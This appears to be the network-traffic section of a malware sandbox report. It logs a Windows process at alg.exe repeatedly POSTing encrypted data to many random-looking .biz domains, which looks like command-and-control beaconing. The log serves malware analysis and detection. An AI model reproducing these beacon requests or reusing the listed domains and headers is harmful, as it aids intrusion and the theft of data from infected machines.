                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.211550951 CET359OUTPOST /ikjsulgnyvsnqbkp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.211550951 CET842OUTData Raw: 6f 78 ef 88 b0 94 45 c6 3e 03 00 00 b6 c3 c1 24 b4 32 f2 8e 86 ce ac a7 6f 64 8e 40 81 33 1a f8 e5 06 a2 05 45 dc ca b1 6d f8 b8 3b 34 5e bf ee 10 24 b5 42 18 96 12 92 34 34 e6 63 26 f0 9d a1 3f c6 d2 a0 1a f1 8e ce 23 ed b6 02 2a 41 69 1f 8a 73
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: oxE>$2od@3Em;4^$B44c&?#*Aisbh!\1q)v8)mvXhkL,$WR4j.TJcZw<OX*3Z4lwrFQRe&W5vNezmPlehixGFBB]cmR(0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.679512978 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=e714b32eca058df5e9c44a4f328b8e0a|155.94.241.187|1731920332|1731920332|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      134192.168.2.75011334.211.97.45805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.642838955 CET343OUTPOST /w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.642905951 CET778OUTData Raw: e9 ce 4f 2d a0 93 81 54 fe 02 00 00 ce 7c bf cd b4 33 58 8e 22 e6 91 44 ad 17 49 43 80 7a 52 9a 7a 4d 14 c7 1a f6 61 a8 7f d9 9a 0a 0d bc 84 fb a3 89 59 0a f9 d4 b4 89 7f f6 62 e8 4d 5f d2 17 35 5c 4a 7a 75 e4 8e b1 3f 2d 70 a5 fa be fd f1 71 e1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: O-T|3X"DICzRzMaYbM_5\Jzu?-pq\P3W[^8nWUF0#ioZ?*2`!.m:lkN96(f|zU^[cpiEv_n3Wu-DA>|w,aKkn
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.468306065 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=3bf5171ec334b266a07a14301027662d|155.94.241.187|1731920332|1731920332|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      135192.168.2.75011413.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.699666023 CET343OUTPOST /aa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.699686050 CET842OUTData Raw: 92 69 d0 82 a5 c2 4a c6 3e 03 00 00 c7 3e 78 d7 c8 9f 55 65 de 0b 18 03 6c 0a 1b 42 0d 40 cc 63 7f eb 0c 29 30 6d 46 6f 52 e6 b9 63 f2 5d 2a 17 c5 3f df 4c c8 cf 9e 5b 09 99 fb ba f4 f2 34 8b cd 39 f0 8e 0e 87 be d4 cf 46 5b d7 db 9a 5b f8 d4 22
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: iJ>>xUelB@c)0mFoRc]*?L[49F[["1*4pk4~]k4gyZ&g"1xIDnoKn,iz76K3p}o3thEcH9&x~y#m8><3HNCyw
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.151648998 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=e68b4434825533a6989d00bfd27d9ffd|155.94.241.187|1731920333|1731920333|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      136192.168.2.75011518.208.156.248805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.837021112 CET349OUTPOST /kxlr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.837044001 CET778OUTData Raw: 59 8c d0 dd d8 72 32 bb fe 02 00 00 26 16 fa 0f e2 51 12 0c 86 da 32 7f 3c ed b8 98 94 61 9e 44 48 a8 6f 43 2a cd ec 94 c6 6a 75 bb 2c 1d eb 68 81 6d b7 94 59 e6 1a a6 7b 72 98 a0 d4 38 08 f2 19 f2 f8 80 32 a2 56 20 02 6c e2 a4 7e 44 2d 62 dd 97
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Yr2&Q2<aDHoC*ju,hmY{r82V l~D-bW0EK"-mibc6bxvXFN+5dq]/zRx0lW({Qu#,?AUh\eGmnVyQ=iFep1tWN2%@:"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:53.511061907 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=a723f079f695f7bbc92f67e09ff0d546|155.94.241.187|1731920333|1731920333|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      137192.168.2.7501163.254.94.185805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.053294897 CET354OUTPOST /dxdpaygfruq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.053333998 CET778OUTData Raw: 62 a1 11 6d c1 3d 4f b4 fe 02 00 00 a5 b6 3c 1b 73 e7 74 47 c5 28 54 25 80 f8 cd 98 9e 8e 07 39 60 96 a8 7b b4 d7 2c 0d 1b d9 25 56 35 ed ed e2 85 3e 92 93 13 f2 9d 2b 33 e3 0b 24 e9 f8 8c 9e 05 9b d6 dc fc 42 8f 5a ba 1e 67 fa 70 58 66 6f 4e 48
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: bm=O<stG(T%9`{,%V5>+3$BZgpXfoNHe1vV xRF8 A73S6)t`J)iDh4}4r9Fu";5xp[lzjfI^>4RiSv]b%79)exk{ptFa/T
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.019613981 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=95cd7d7db89d2875ef64d50db40e4427|155.94.241.187|1731920334|1731920334|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      138192.168.2.75011718.208.156.24880
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.169595957 CET361OUTPOST /tswjxcwwmwucbcyw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.169617891 CET842OUTData Raw: 4f ca 74 92 93 71 68 3f 3e 03 00 00 ee 0c 83 37 54 6c 10 7c 60 47 96 58 58 4b d1 49 78 7c 73 31 13 12 fb 2a 6e fe c4 65 d0 88 db 3e 51 5a bd cc e3 49 65 77 df f4 89 2c 33 6f 38 ad 43 6c e0 da f5 14 7e 67 19 20 80 82 fc 75 63 eb b8 a7 54 48 e1 33
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Otqh?>7Tl|`GXXKIx|s1*ne>QZIew,3o8Cl~g ucTH3hA0B2lk_xWl3-E+?{_+=}t_Q4U^.eMEuR#bpu=XRL#>Km.8f:iANz|cJ9X2(TiW
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.832071066 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=23b355411bf0c5b73d52f9331088da4e|155.94.241.187|1731920334|1731920334|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      139192.168.2.75011818.246.231.12080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.851847887 CET343OUTPOST /ne HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.851871014 CET842OUTData Raw: e1 5b e8 c5 55 1b 98 26 3e 03 00 00 2d 8a d6 94 27 18 43 e3 95 26 c7 80 75 69 13 93 58 0c 7f 5b c9 c0 c1 7c d0 90 7d 9a 89 55 b9 a3 77 e2 33 7b 4e 91 72 96 6d 1a 97 67 f3 30 d0 77 df b4 ae 0c 6a 43 8e 18 18 4d af 08 b7 08 63 91 98 6d af d5 10 49
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: [U&>-'C&uiX[|}Uw3{Nrmg0wjCMcmIznmutU{<n^)3"V{a)-W;1rH-S/MG<%_F$cm|cHE19|~Yd=~5QAU[]{hj=g
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.684005976 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=fb28874f9e50e9f413f1c54e4465ef4a|155.94.241.187|1731920335|1731920335|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      140192.168.2.75011954.244.188.177805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.451864004 CET346OUTPOST /qmctu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.451864004 CET778OUTData Raw: 9d 4b cf 87 c4 4e 9a ea fe 02 00 00 5e e5 b4 93 f0 dd cf d7 7b 64 bf ee 11 cb 3c 55 fe 66 1a a1 51 28 4e 1d cb 8f 09 d8 7e cd 17 61 52 93 da ac 73 b3 2f 08 5c 6c 21 b9 0c 2e 5b 7d 77 2c cc 78 89 37 e4 db f7 be 6d b2 c8 26 9b e6 11 e1 6f d1 af 74
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: KN^{d<UfQ(N~aRs/\l!.[}w,x7m&ot0C`n[`QZ!|rB.~/Q\=ag JS:gZ^mX;+hr2T9!vrqV,u]U!-npV9hN!pR
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.293092012 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=99cc97a2b88e7121122fd148d1ca2139|155.94.241.187|1731920336|1731920336|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      141192.168.2.75012044.221.84.10580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.701067924 CET352OUTPOST /sdgvcmfo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.701088905 CET842OUTData Raw: d7 4c 93 78 90 20 53 c5 3e 03 00 00 18 c8 fb 16 eb bb 15 0c 97 16 6e 36 d3 35 8f 18 c4 8d 50 0f 5a 98 7e c4 fc 6d 1b 9f 0c 69 0b 5a 73 c1 bb 51 16 f8 a4 82 92 02 67 5b 47 bf df d6 e7 af c5 af 08 23 df de 10 9a 7b 85 68 12 1b 42 91 52 29 43 5b c2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Lx S>n65PZ~miZsQg[G#{hBR)C[R&yv(nM<|NzR('^?C_'w}J1>t8p^38-=#rM>yW?uZCT]>mv7-p
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.374641895 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=5d1cb0185f2a22d6bdad1740f014f68e|155.94.241.187|1731920336|1731920336|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      142192.168.2.75012154.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.393744946 CET356OUTPOST /wkalxigrfxgkug HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.393779039 CET842OUTData Raw: 9d a4 89 9f fc 36 09 b8 3e 03 00 00 d8 f0 04 67 ea 82 7a 5f be 0c 95 a8 c7 14 6c 00 c3 10 6c 99 91 a0 37 7d 63 00 67 ce 18 9f 68 4a d6 2b 92 99 60 c9 a4 57 6d 0a 14 e3 a7 fb 45 12 43 e0 22 8d a6 45 9c 81 0e 9a 73 e2 03 83 f3 55 01 90 37 9a 07 1f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 6>gz_ll7}cghJ+`WmEC"EsU7 H%30.X!}>q`Aa@rD"wNxsad^=.U*yI+kiAj0bBnQaCWU<B|oN'%`K<%j.AU!`BZTr
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.233956099 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=7ca220507c288f95b339ab8ad15ad990|155.94.241.187|1731920337|1731920337|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
